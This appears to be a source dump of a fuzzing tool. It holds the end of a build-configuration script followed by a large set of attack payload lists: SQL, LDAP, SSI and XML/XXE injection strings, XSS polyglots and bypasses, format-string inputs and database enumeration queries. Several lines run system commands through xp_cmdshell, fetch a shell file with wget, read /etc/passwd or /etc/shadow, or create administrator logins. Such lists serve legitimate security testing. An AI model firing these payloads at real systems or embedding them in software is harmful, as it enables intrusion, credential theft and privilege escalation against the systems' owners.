-l` -gt "0" ]) 73 | if test "$OS_IS_REDHAT" = "0"; then 74 | AC_DEFINE([__REDHAT], [], ["build for RedHat"]) 75 | AC_MSG_NOTICE([trying to build for a RedHat based system]) 76 | fi 77 | AM_CONDITIONAL(OS_IS_DEBIAN, [ test `grep "Debian\|Ubuntu\|Kali" /etc/os-release | wc -l` -gt "0" ]) 78 | if test "$OS_IS_DEBIAN" = "0"; then 79 | AC_DEFINE([__DEBIAN], [], ["build for Debian"]) 80 | AC_MSG_NOTICE([trying to build for a Debian based system]) 81 | fi 82 | AM_CONDITIONAL(OS_IS_KALI, [ test `grep "Kali" /etc/os-release | wc -l` -gt "0" ]) 83 | if test "$OS_IS_KALI" = "0"; then 84 | AC_DEFINE([__KALI__], [], ["build for Kali"]) 85 | AC_MSG_NOTICE([trying to build for a Kali based system]) 86 | fi 87 | AM_CONDITIONAL(OS_IS_ARCH, [ test `grep "arch" -i /etc/os-release | wc -l` -gt "0" ]) 88 | if test "$OS_IS_ARCH" = "0"; then 89 | AC_DEFINE([__ARCH__], [], ["build for Arch"]) 90 | AC_MSG_NOTICE([trying to build for a Arch based system]) 91 | fi 92 | AM_CONDITIONAL(OS_IS_FREEBSD, [ test `uname -o` == "FreeBSD" ]) 93 | if test "$IS_IS_FREEBSD" = "0"; then 94 | AC_DEFINE([__UNKNOWN], [], ["build for FreeBSD"]) 95 | AC_MSG_NOTICE([trying to build for a FreeBSD based system]) 96 | fi 97 | AM_CONDITIONAL(OS_IS_UNKNOWN, [ test `test -e /dummy; echo $?` -eq "0" ]) 98 | if test "$OS_IS_UNKNOWN" = "0"; then 99 | AC_DEFINE([__UNKNOWN], [], ["build for Unknown"]) 100 | AC_MSG_NOTICE([trying to build for a unknown system]) 101 | fi 102 | AC_OUTPUT 103 | -------------------------------------------------------------------------------- /examples/all: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/examples/all -------------------------------------------------------------------------------- /examples/nasty/DB2Enumeration.fuzzdb.txt: -------------------------------------------------------------------------------- 1 | select versionnumber, version_timestamp from sysibm.sysversions; 2 | select user from sysibm.sysdummy1; 3 | select session_user from sysibm.sysdummy1; 4 | select system_user from sysibm.sysdummy1; 5 | select current server from sysibm.sysdummy1; 6 | select name from sysibm.systables; 7 | select grantee from syscat.dbauth; 8 | select * from syscat.tabauth; 9 | select * from syscat.dbauth where grantee = current user; 10 | select * from syscat.tabauth where grantee = current user; 11 | select name, tbname, coltype from sysibm.syscolumns; 12 | SELECT schemaname FROM syscat.schemata; 13 | -------------------------------------------------------------------------------- /examples/nasty/FORMATSTRING-JHADDIX.txt: -------------------------------------------------------------------------------- 1 | %p%p%p%p 2 | %p%p%p%p%p%p%p%p%p%p 3 | %p * 55 4 | %p * 129 5 | %p * 257 6 | %p * 513 7 | %x%x%x%x 8 | %x%x%x%x%x%x%x%x%x%x 9 | %x * 55 10 | %x * 129 11 | %x * 257 12 | %x * 513 13 | %d%d%d%d 14 | %d%d%d%d%d%d%d%d%d%d 15 | %d * 55 16 | %d * 129 17 | %d * 257 18 | %d * 513 19 | %s%s%s%s 20 | %s%s%s%s%s%s%s%s%s%s 21 | %s * 55 22 | %s * 129 23 | %s * 257 24 | %s * 513 25 | %n%n%n%n 26 | %n%n%n%n%n%n%n%n%n%n 27 | %n * 55 28 | %n * 129 29 | %n * 257 30 | %n * 513 31 | %u%u%u%u 32 | %u%u%u%u%u%u%u%u%u%u 33 | %u * 55 34 | %u * 129 35 | %u * 257 36 | %u * 513 37 | %%%%%%%% 38 | %%%%%%%%%%%%%%%%%%%% 39 | %% * 55 40 | %% * 129 41 | %% * 257 42 | %% * 513 43 | %s%p%x%d 44 | %s%p%x%d%s%p%x%d%s%p%x%d 45 | %s%p%x%d * 55 46 | %s%p%x%d * 129 47 | %s%p%x%d * 257 48 | %s%p%x%d * 513 49 | .1024d 50 | %.2049d 51 | %99999999999s 52 | %08x 53 | %%20d 54 | %%20n 55 | %%20x 56 | %%20s 57 | %#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%% 58 | %s%p%x%d 59 | .1024d 60 | %.2049d 61 | %p%p%p%p 62 | %x%x%x%x 63 | %d%d%d%d 64 | %s%s%s%s 65 | %99999999999s 66 | %08x 67 | %%20d 68 | %%20n 69 | %%20x 70 | %%20s 71 | %s%s%s%s%s%s%s%s%s%s 72 | %p%p%p%p%p%p%p%p%p%p 73 | %#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%% 74 | %s x 129 75 | %x x 257 76 | -------------------------------------------------------------------------------- /examples/nasty/FuzzingStrings-SkullSecurity.org.txt: -------------------------------------------------------------------------------- 1 | "A" x 33 2 | "A" x 254 3 | "A" x 255 4 | "A" x 511 5 | "A" x 1023 6 | "A" x 1024 7 | "A" x 2047 8 | "A" x 2048 9 | "A" x 4096 10 | "A" x 5000 11 | "A" x 10000 12 | "A" x 20000 13 | "A" x 30000 14 | "A" x 40000 15 | "A" x 65530 16 | "A" x 65536 17 | "A" x 75536 18 | "%s" x 4 19 | "%s" x 8 20 | "%s" x 15 21 | "%s" x 30 22 | "%x" x 1024 23 | "%n" x 1025 24 | "%s" x 2048 25 | "%s%n%x%d" x 5000 26 | "%s" x 30000 27 | "%s" x 40000 28 | "%.1024d" 29 | "%.2048d" 30 | "%.4096d" 31 | "%.8200d" 32 | "%99999999999s" 33 | "%99999999999d" 34 | "%99999999999x" 35 | "%99999999999n" 36 | "%99999999999s" x 1000 37 | "%99999999999d" x 1000 38 | "%99999999999x" x 1000 39 | "%99999999999n" x 1000 40 | "%08x" x 100 41 | "%%20s" x 1000 42 | "%%20x" x 1000 43 | "%%20n" x 1000 44 | "%%20d" x 1000 45 | "%#0123456x%08x%x%s%p%n%d%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%#0123456x%%x%%s%%p%%n%%d%%o%%u%%c%%h%%l%%q%%j%%z%%Z%%t%%i%%e%%g%%f%%a%%C%%S%%08x" 46 | 47 | -------------------------------------------------------------------------------- /examples/nasty/Generic-BlindSQLi.fuzzdb.txt: -------------------------------------------------------------------------------- 1 | # from wapiti 2 | sleep(__TIME__)# 3 | 1 or sleep(__TIME__)# 4 | " or sleep(__TIME__)# 5 | ' or sleep(__TIME__)# 6 | " or sleep(__TIME__)=" 7 | ' or sleep(__TIME__)=' 8 | 1) or sleep(__TIME__)# 9 | ") or sleep(__TIME__)=" 10 | ') or sleep(__TIME__)=' 11 | 1)) or sleep(__TIME__)# 12 | ")) or sleep(__TIME__)=" 13 | ')) or sleep(__TIME__)=' 14 | ;waitfor delay '0:0:__TIME__'-- 15 | );waitfor delay '0:0:__TIME__'-- 16 | ';waitfor delay '0:0:__TIME__'-- 17 | ";waitfor delay '0:0:__TIME__'-- 18 | ');waitfor delay '0:0:__TIME__'-- 19 | ");waitfor delay '0:0:__TIME__'-- 20 | ));waitfor delay '0:0:__TIME__'-- 21 | '));waitfor delay '0:0:__TIME__'-- 22 | "));waitfor delay '0:0:__TIME__'-- 23 | benchmark(10000000,MD5(1))# 24 | 1 or benchmark(10000000,MD5(1))# 25 | " or benchmark(10000000,MD5(1))# 26 | ' or benchmark(10000000,MD5(1))# 27 | 1) or benchmark(10000000,MD5(1))# 28 | ") or benchmark(10000000,MD5(1))# 29 | ') or benchmark(10000000,MD5(1))# 30 | 1)) or benchmark(10000000,MD5(1))# 31 | ")) or benchmark(10000000,MD5(1))# 32 | ')) or benchmark(10000000,MD5(1))# 33 | pg_sleep(__TIME__)-- 34 | 1 or pg_sleep(__TIME__)-- 35 | " or pg_sleep(__TIME__)-- 36 | ' or pg_sleep(__TIME__)-- 37 | 1) or pg_sleep(__TIME__)-- 38 | ") or pg_sleep(__TIME__)-- 39 | ') or pg_sleep(__TIME__)-- 40 | 1)) or pg_sleep(__TIME__)-- 41 | ")) or pg_sleep(__TIME__)-- 42 | ')) or pg_sleep(__TIME__)-- 43 | -------------------------------------------------------------------------------- /examples/nasty/Generic-SQLi.txt: -------------------------------------------------------------------------------- 1 | )%20or%20('x'='x 2 | %20or%201=1 3 | ; execute immediate 'sel' || 'ect us' || 'er' 4 | benchmark(10000000,MD5(1))# 5 | update 6 | ";waitfor delay '0:0:__TIME__'-- 7 | 1) or pg_sleep(__TIME__)-- 8 | ||(elt(-3+5,bin(15),ord(10),hex(char(45)))) 9 | "hi"") or (""a""=""a" 10 | delete 11 | like 12 | " or sleep(__TIME__)# 13 | pg_sleep(__TIME__)-- 14 | *(|(objectclass=*)) 15 | declare @q nvarchar (200) 0x730065006c00650063 ... 16 | or 0=0 # 17 | insert 18 | 1) or sleep(__TIME__)# 19 | ) or ('a'='a 20 | ; exec xp_regread 21 | *| 22 | @var select @var as var into temp end -- 23 | 1)) or benchmark(10000000,MD5(1))# 24 | asc 25 | (||6) 26 | "a"" or 3=3--" 27 | " or benchmark(10000000,MD5(1))# 28 | # from wapiti 29 | or 0=0 -- 30 | 1 waitfor delay '0:0:10'-- 31 | or 'a'='a 32 | hi or 1=1 --" 33 | or a = a 34 | UNION ALL SELECT 35 | ) or sleep(__TIME__)=' 36 | )) or benchmark(10000000,MD5(1))# 37 | hi' or 'a'='a 38 | 0 39 | 21 % 40 | limit 41 | or 1=1 42 | or 2 > 1 43 | ")) or benchmark(10000000,MD5(1))# 44 | PRINT 45 | hi') or ('a'='a 46 | or 3=3 47 | ));waitfor delay '0:0:__TIME__'-- 48 | a' waitfor delay '0:0:10'-- 49 | 1;(load_file(char(47,101,116,99,47,112,97,115, ... 50 | or%201=1 51 | 1 or sleep(__TIME__)# 52 | or 1=1 53 | and 1 in (select var from temp)-- 54 | or '7659'='7659 55 | or 'text' = n'text' 56 | -- 57 | or 1=1 or ''=' 58 | declare @s varchar (200) select @s = 0x73656c6 ... 59 | exec xp 60 | ; exec master..xp_cmdshell 'ping 172.10.1.255'-- 61 | 3.10E+17 62 | " or pg_sleep(__TIME__)-- 63 | x' AND email IS NULL; -- 64 | & 65 | admin' or ' 66 | or 'unusual' = 'unusual' 67 | // 68 | truncate 69 | 1) or benchmark(10000000,MD5(1))# 70 | \x27UNION SELECT 71 | declare @s varchar(200) select @s = 0x77616974 ... 72 | tz_offset 73 | sqlvuln 74 | "));waitfor delay '0:0:__TIME__'-- 75 | ||6 76 | or%201=1 -- 77 | %2A%28%7C%28objectclass%3D%2A%29%29 78 | or a=a 79 | ) union select * from information_schema.tables; 80 | PRINT @@variable 81 | or isNULL(1/0) /* 82 | 26 % 83 | " or "a"="a 84 | (sqlvuln) 85 | x' AND members.email IS NULL; -- 86 | or 1=1-- 87 | and 1=( if((load_file(char(110,46,101,120,11 ... 88 | 0x770061006900740066006F0072002000640065006C00 ... 89 | %20'sleep%2050' 90 | as 91 | 1)) or pg_sleep(__TIME__)-- 92 | /**/or/**/1/**/=/**/1 93 | union all select @@version-- 94 | ,@variable 95 | (sqlattempt2) 96 | or (EXISTS) 97 | t'exec master..xp_cmdshell 'nslookup www.googl ... 98 | %20$(sleep%2050) 99 | 1 or benchmark(10000000,MD5(1))# 100 | %20or%20''=' 101 | ||UTL_HTTP.REQUEST 102 | or pg_sleep(__TIME__)-- 103 | hi' or 'x'='x'; 104 | ") or sleep(__TIME__)=" 105 | or 'whatever' in ('whatever') 106 | ; begin declare @var varchar(8000) set @var=' ... 107 | union select 1,load_file('/etc/passwd'),1,1,1; 108 | 0x77616974666F722064656C61792027303A303A313027 ... 109 | exec(@s) 110 | ) or pg_sleep(__TIME__)-- 111 | union select 112 | or sleep(__TIME__)# 113 | select * from information_schema.tables-- 114 | a' or 1=1-- 115 | a' or 'a' = 'a 116 | declare @s varchar(22) select @s = 117 | or 2 between 1 and 3 118 | or a=a-- 119 | or '1'='1 120 | | 121 | or sleep(__TIME__)=' 122 | or 1 --' 123 | or 0=0 #" 124 | having 125 | a' 126 | " or isNULL(1/0) /* 127 | declare @s varchar (8000) select @s = 0x73656c ... 128 | ‘ or 1=1 -- 129 | char%4039%41%2b%40SELECT 130 | order by 131 | bfilename 132 | having 1=1-- 133 | ) or benchmark(10000000,MD5(1))# 134 | or username like char(37); 135 | ;waitfor delay '0:0:__TIME__'-- 136 | " or 1=1-- 137 | x' AND userid IS NULL; -- 138 | */* 139 | or 'text' > 't' 140 | (select top 1 141 | or benchmark(10000000,MD5(1))# 142 | ");waitfor delay '0:0:__TIME__'-- 143 | a' or 3=3-- 144 | -- &password= 145 | group by userid having 1=1-- 146 | or ''=' 147 | ; exec master..xp_cmdshell 148 | %20or%20x=x 149 | select 150 | ")) or sleep(__TIME__)=" 151 | 0x730065006c0065006300740020004000400076006500 ... 152 | hi' or 1=1 -- 153 | ") or pg_sleep(__TIME__)-- 154 | %20or%20'x'='x 155 | or 'something' = 'some'+'thing' 156 | exec sp 157 | 29 % 158 | ( 159 | ý or 1=1 -- 160 | 1 or pg_sleep(__TIME__)-- 161 | 0 or 1=1 162 | ) or (a=a 163 | uni/**/on sel/**/ect 164 | replace 165 | %27%20or%201=1 166 | )) or pg_sleep(__TIME__)-- 167 | %7C 168 | x' AND 1=(SELECT COUNT(*) FROM tabname); -- 169 | '%20OR 170 | ; or '1'='1' 171 | declare @q nvarchar (200) select @q = 0x770061 ... 172 | 1 or 1=1 173 | ; exec ('sel' + 'ect us' + 'er') 174 | 23 OR 1=1 175 | / 176 | anything' OR 'x'='x 177 | declare @q nvarchar (4000) select @q = 178 | or 0=0 -- 179 | desc 180 | ||'6 181 | ) 182 | 1)) or sleep(__TIME__)# 183 | or 0=0 # 184 | select name from syscolumns where id = (sele ... 185 | hi or a=a 186 | *(|(mail=*)) 187 | password:*/=1-- 188 | distinct 189 | );waitfor delay '0:0:__TIME__'-- 190 | to_timestamp_tz 191 | ") or benchmark(10000000,MD5(1))# 192 | UNION SELECT 193 | %2A%28%7C%28mail%3D%2A%29%29 194 | +sqlvuln 195 | or 1=1 /* 196 | )) or sleep(__TIME__)=' 197 | or 1=1 or ""= 198 | or 1 in (select @@version)-- 199 | sqlvuln; 200 | union select * from users where login = char ... 201 | x' or 1=1 or 'x'='y 202 | 28 % 203 | ‘ or 3=3 -- 204 | @variable 205 | or '1'='1'-- 206 | "a"" or 1=1--" 207 | //* 208 | %2A%7C 209 | " or 0=0 -- 210 | ")) or pg_sleep(__TIME__)-- 211 | ? 212 | or 1/* 213 | ! 214 | ' 215 | or a = a 216 | declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q) 217 | declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s) 218 | declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q) 219 | declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s) 220 | ' or 1=1 221 |  or 1=1 -- 222 | x' OR full_name LIKE '%Bob% 223 | '; exec master..xp_cmdshell 'ping 172.10.1.255'-- 224 | '%20or%20''=' 225 | '%20or%20'x'='x 226 | ')%20or%20('x'='x 227 | ' or 0=0 -- 228 | ' or 0=0 # 229 | or 0=0 #" 230 | ' or 1=1-- 231 | ' or '1'='1'-- 232 | ' or 1 --' 233 | or 1=1-- 234 | ' or 1=1 or ''=' 235 | or 1=1 or ""= 236 | ' or a=a-- 237 | or a=a 238 | ') or ('a'='a 239 | 'hi' or 'x'='x'; 240 | or 241 | procedure 242 | handler 243 | ' or username like '% 244 | ' or uname like '% 245 | ' or userid like '% 246 | ' or uid like '% 247 | ' or user like '% 248 | '; exec master..xp_cmdshell 249 | '; exec xp_regread 250 | t'exec master..xp_cmdshell 'nslookup www.google.com'-- 251 | --sp_password 252 | ' UNION SELECT 253 | ' UNION ALL SELECT 254 | ' or (EXISTS) 255 | ' (select top 1 256 | '||UTL_HTTP.REQUEST 257 | 1;SELECT%20* 258 | <>"'%;)(&+ 259 | '%20or%201=1 260 | 'sqlattempt1 261 | %28 262 | %29 263 | %26 264 | %21 265 | ' or ''=' 266 | ' or 3=3 267 |  or 3=3 -- 268 | -------------------------------------------------------------------------------- /examples/nasty/LDAP.Fuzzinging.txt: -------------------------------------------------------------------------------- 1 | ! 2 | %21 3 | %26 4 | %28 5 | %29 6 | %2A%28%7C%28mail%3D%2A%29%29 7 | %2A%28%7C%28objectclass%3D%2A%29%29 8 | %2A%7C 9 | %7C 10 | & 11 | ( 12 | ) 13 | *(|(mail=*)) 14 | *(|(objectclass=*)) 15 | */* 16 | *| 17 | / 18 | // 19 | //* 20 | @* 21 | x' or name()='username' or 'x'='y 22 | | 23 | *()|&' 24 | admin* 25 | admin*)((|userpassword=*) 26 | *)(uid=*))(|(uid=* 27 | -------------------------------------------------------------------------------- /examples/nasty/MSSQL-Enumeration.fuzzdb.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/examples/nasty/MSSQL-Enumeration.fuzzdb.txt -------------------------------------------------------------------------------- /examples/nasty/MSSQL.fuzzdb.txt: -------------------------------------------------------------------------------- 1 | # you will need to customize/modify some of the vaules in the queries for best effect 2 | '; exec master..xp_cmdshell 'ping 10.10.1.2'-- 3 | 'create user name identified by 'pass123' -- 4 | 'create user name identified by pass123 temporary tablespace temp default tablespace users; 5 | ' ; drop table temp -- 6 | 'exec sp_addlogin 'name' , 'password' -- 7 | ' exec sp_addsrvrolemember 'name' , 'sysadmin' -- 8 | ' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) -- 9 | ' grant connect to name; grant resource to name; -- 10 | ' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64) 11 | ' or 1=1 -- 12 | ' union (select @@version) -- 13 | ' union (select NULL, (select @@version)) -- 14 | ' union (select NULL, NULL, (select @@version)) -- 15 | ' union (select NULL, NULL, NULL, (select @@version)) -- 16 | ' union (select NULL, NULL, NULL, NULL, (select @@version)) -- 17 | ' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) -- 18 | -------------------------------------------------------------------------------- /examples/nasty/MYSQL.fuzzdb.txt: -------------------------------------------------------------------------------- 1 | 1'1 2 | 1 exec sp_ (or exec xp_) 3 | 1 and 1=1 4 | 1' and 1=(select count(*) from tablenames); -- 5 | 1 or 1=1 6 | 1' or '1'='1 7 | -------------------------------------------------------------------------------- /examples/nasty/Metacharacters.fuzzdb.txt: -------------------------------------------------------------------------------- 1 | !' 2 | !@#$%%^#$%#$@#$%$$@#$%^^**(() 3 | !@#0%^#0##018387@#0^^**(() 4 | ">\x3csVg/\x3e 2 | -------------------------------------------------------------------------------- /examples/nasty/Polyglots/XSS-Polyglots-Dmiessler.txt: -------------------------------------------------------------------------------- 1 | javascript://'/-->*/alert()/* 2 | javascript://-->"/*/a 3 | javascript://"/*// 4 | javascript://-->*/alert()/* 5 | javascript://'//" -->*/alert()/* 6 | javascript://
  • */alert()/* 8 | -->"/*/alert()/* 9 | /*/alert()/* 10 | javascript://-->*/alert()/* 12 | -------------------------------------------------------------------------------- /examples/nasty/Polyglots/XSS-Polyglots.txt: -------------------------------------------------------------------------------- 1 | ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'> 2 | “ onclick=alert(1)//"><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg"> 4 | javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/* 5 | javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a 6 | javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/ 7 | javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/* 8 | javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/* 9 | javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()// 10 | javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/* 11 | --></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/* 12 | /</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/* 13 | javascript://--></title></style></textarea></script><svg "//' onclick=alert()// 14 | /</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/* 15 | -------------------------------------------------------------------------------- /examples/nasty/Postgres-Enumeration.fuzzdb.txt: -------------------------------------------------------------------------------- 1 | # info disclosure payload fuzzfile for pgsql 2 | select version(); 3 | select current_database(); 4 | select current_user; 5 | select session_user; 6 | select current_setting('log_connections'); 7 | select current_setting('log_statement'); 8 | select current_setting('port'); 9 | select current_setting('password_encryption'); 10 | select current_setting('krb_server_keyfile'); 11 | select current_setting('virtual_host'); 12 | select current_setting('port'); 13 | select current_setting('config_file'); 14 | select current_setting('hba_file'); 15 | select current_setting('data_directory'); 16 | select * from pg_shadow; 17 | select * from pg_group; 18 | create table myfile (input TEXT); 19 | copy myfile from '/etc/passwd'; 20 | select * from myfile;copy myfile to /tmp/test; 21 | -------------------------------------------------------------------------------- /examples/nasty/SSI-Injection-JHADDIX.txt: -------------------------------------------------------------------------------- 1 | <pre><!--#exec cmd="ls" --></pre> 2 | <pre><!--#echo var="DATE_LOCAL" --> </pre> 3 | <pre><!--#exec cmd="whoami"--></pre> 4 | <pre><!--#exec cmd="dir" --></pre> 5 | <!--#exec cmd="ls" --> 6 | <!--#exec cmd="wget http://website.com/dir/shell.txt" --> 7 | <!--#exec cmd="/bin/ls /" --> 8 | <!--#exec cmd="dir" --> 9 | <!--#exec cmd="cd C:\WINDOWS\System32"> 10 | <!--#config errmsg="File not found, informs users and password"--> 11 | <!--#echo var="DOCUMENT_NAME" --> 12 | <!--#echo var="DOCUMENT_URI" --> 13 | <!--#config timefmt="A %B %d %Y %r"--> 14 | <!--#fsize file="ssi.shtml" --> 15 | <!--#include file=?UUUUUUUU...UU?--> 16 | <!--#echo var="DATE_LOCAL" --> 17 | <!--#exec cmd="whoami"--> 18 | <!--#printenv --> 19 | <!--#flastmod virtual="echo.html" --> 20 | <!--#echo var="auth_type" --> 21 | <!--#echo var="http_referer" --> 22 | <!--#echo var="content_length" --> 23 | <!--#echo var="content_type" --> 24 | <!--#echo var="http_accept_encoding" --> 25 | <!--#echo var="forwarded" --> 26 | <!--#echo var="document_uri" --> 27 | <!--#echo var="date_gmt" --> 28 | <!--#echo var="date_local" --> 29 | <!--#echo var="document_name" --> 30 | <!--#echo var="document_root" --> 31 | <!--#echo var="from" --> 32 | <!--#echo var="gateway_interface" --> 33 | <!--#echo var="http_accept" --> 34 | <!--#echo var="http_accept_charset" --> 35 | <!--#echo var="http_accept_language" --> 36 | <!--#echo var="http_connection" --> 37 | <!--#echo var="http_cookie" --> 38 | <!--#echo var="http_form" --> 39 | <!--#echo var="http_host" --> 40 | <!--#echo var="user_name" --> 41 | <!--#echo var="unique_id" --> 42 | <!--#echo var="tz" --> 43 | <!--#echo var="total_hits" --> 44 | <!--#echo var="server_software" --> 45 | <!--#echo var="server_protocol" --> 46 | <!--#echo var="server_port" --> 47 | <!--#echo var="server_name --> 48 | <!--#echo var="server_addr" --> 49 | <!--#echo var="server_admin" --> 50 | <!--#echo var="script_url" --> 51 | <!--#echo var="script_uri" --> 52 | <!--#echo var="script_name" --> 53 | <!--#echo var="script_filename" --> 54 | <!--#echo var="netsite_root" --> 55 | <!--#echo var="site_htmlroot" --> 56 | <!--#echo var="path_translated" --> 57 | <!--#echo var="path_info_translated" --> 58 | <!--#echo var="request_uri" --> 59 | <!--#echo var="request_method" --> 60 | <!--#echo var="remote_user" --> 61 | <!--#echo var="remote_addr" --> 62 | <!--#echo var="http_client_ip" --> 63 | <!--#echo var="remote_port" --> 64 | <!--#echo var="remote_ident" --> 65 | <!--#echo var="remote_host" --> 66 | <!--#echo var="query_string_unescaped" --> 67 | <!--#echo var="query_string" --> 68 | <!--#echo var="path_translated" --> 69 | <!--#echo var="path_info" --> 70 | <!--#echo var="path" --> 71 | <!--#echo var="page_count" --> 72 | <!--#echo var="last_modified" --> 73 | <!--#echo var="http_user_agent" --> 74 | <!--#echo var="http_ua_os" --> 75 | <!--#echo var="http_ua_cpu" --> 76 | -------------------------------------------------------------------------------- /examples/nasty/URI-XSS.fuzzdb.txt: -------------------------------------------------------------------------------- 1 | # Contains statements from jbrofuzz (13 April 2010) 2 | aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat" 3 | firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');" 4 | navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozilla.org/file/local;1\'].createInstance(I.nsILocalFile);file.initWithPath(\'C:\'+String.fromCharCode(92)+String.fromCharCode(92)+\'Windows\'+String.fromCharCode(92)+String.fromCharCode(92)+\'System32\'+String.fromCharCode(92)+String.fromCharCode(92)+\'cmd.exe\');process=C[\'@mozilla.org/process/util;1\'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process) 5 | res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210 6 | 7 | -------------------------------------------------------------------------------- /examples/nasty/XML-FUZZ.txt: -------------------------------------------------------------------------------- 1 | ## After XML Declaration 2 | 3 | <![CDATA[<script>var n=0;while(true){n++;}</script>]]> 4 | <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('gotcha');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo> 5 | <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foof> 6 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xee;</foo> 7 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xee;</foo> 8 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xee;</foo> 9 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///dev/random">]><foo>&xee;</foo> 10 | <!DOCTYPE autofillupload [<!ENTITY D71Mn SYSTEM "file:///c:/boot.ini"> 11 | ]> 12 | <!DOCTYPE autofillupload [<!ENTITY 9eTVC SYSTEM "file:///etc/passwd"> 13 | ]> 14 | "<xml ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]>" 15 | "<xml ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:alert('XSS')""></B></I></xml><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>" 16 | "<xml SRC=""xsstest.xml"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>" 17 | "<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""><xss:xss>XSS</xss:xss></HTML>" 18 | <name>','')); phpinfo(); exit;/*</name> 19 | 20 | 21 | ## Element and Attrib Values 22 | 23 | null 24 | * 25 | % 26 | @ 27 | $ 28 | - 29 | + 30 | ; 31 | : 32 | 0 33 | -1 34 | 1 35 | 0.1 36 | 0.9 37 | true 38 | false 39 | 1.7976931348623157e+308 40 | 5e-324 41 | 0.00005 42 | 5e-10 43 | &apos;XoiZR 44 | &quot;XoiZR 45 | &lt;Tnn96&gt; 46 | &lt;?Tnn96 ?&gt; 47 | &lt;? Tnn96 ?&gt; 48 | &lt;% Tnn96 %&gt; 49 | &lt;%= Tnn96 %&gt; 50 | [Tnn96] 51 | (Tnn96) 52 | {Tnn96} 53 | {{Tnn96}} 54 | {= Tnn96} 55 | {{= Tnn96}} 56 | ' or '1'='1 57 | ' or ''=' 58 | x' or 1=1 or 'x'='y 59 | / 60 | // 61 | //* 62 | */* 63 | @* 64 | count(/child::node()) 65 | x' or name()='username' or 'x'='y 66 | -------------------------------------------------------------------------------- /examples/nasty/XSS-BYPASS-STRINGS-BRUTELOGIC.txt: -------------------------------------------------------------------------------- 1 | alert`1` 2 | alert&lpar;1&rpar; 3 | alert&#x28;1&#x29 4 | alert&#40;1&#41 5 | (alert)(1) 6 | a=alert,a(1) 7 | [1].find(alert) 8 | top["al"+"ert"](1) 9 | top[/al/.source+/ert/.source](1) 10 | al\u0065rt(1) 11 | top['al\145rt'](1) 12 | top['al\x65rt'](1) 13 | top[8680439..toString(30)](1) 14 | navigator.vibrate(500) 15 | eval(URL.slice(-8))>#alert(1) 16 | eval(location.hash.slice(1)>#alert(1) 17 | innerHTML=location.hash>#<script>alert(1)</script> 18 | -------------------------------------------------------------------------------- /examples/nasty/XSS-BruteLogic.txt: -------------------------------------------------------------------------------- 1 | <svg onload=alert(1)> 2 | "><svg onload=alert(1)// 3 | "onmouseover=alert(1)// 4 | "autofocus/onfocus=alert(1)// 5 | '-alert(1)-' 6 | '-alert(1)// 7 | \'-alert(1)// 8 | </script><svg onload=alert(1)> 9 | <x contenteditable 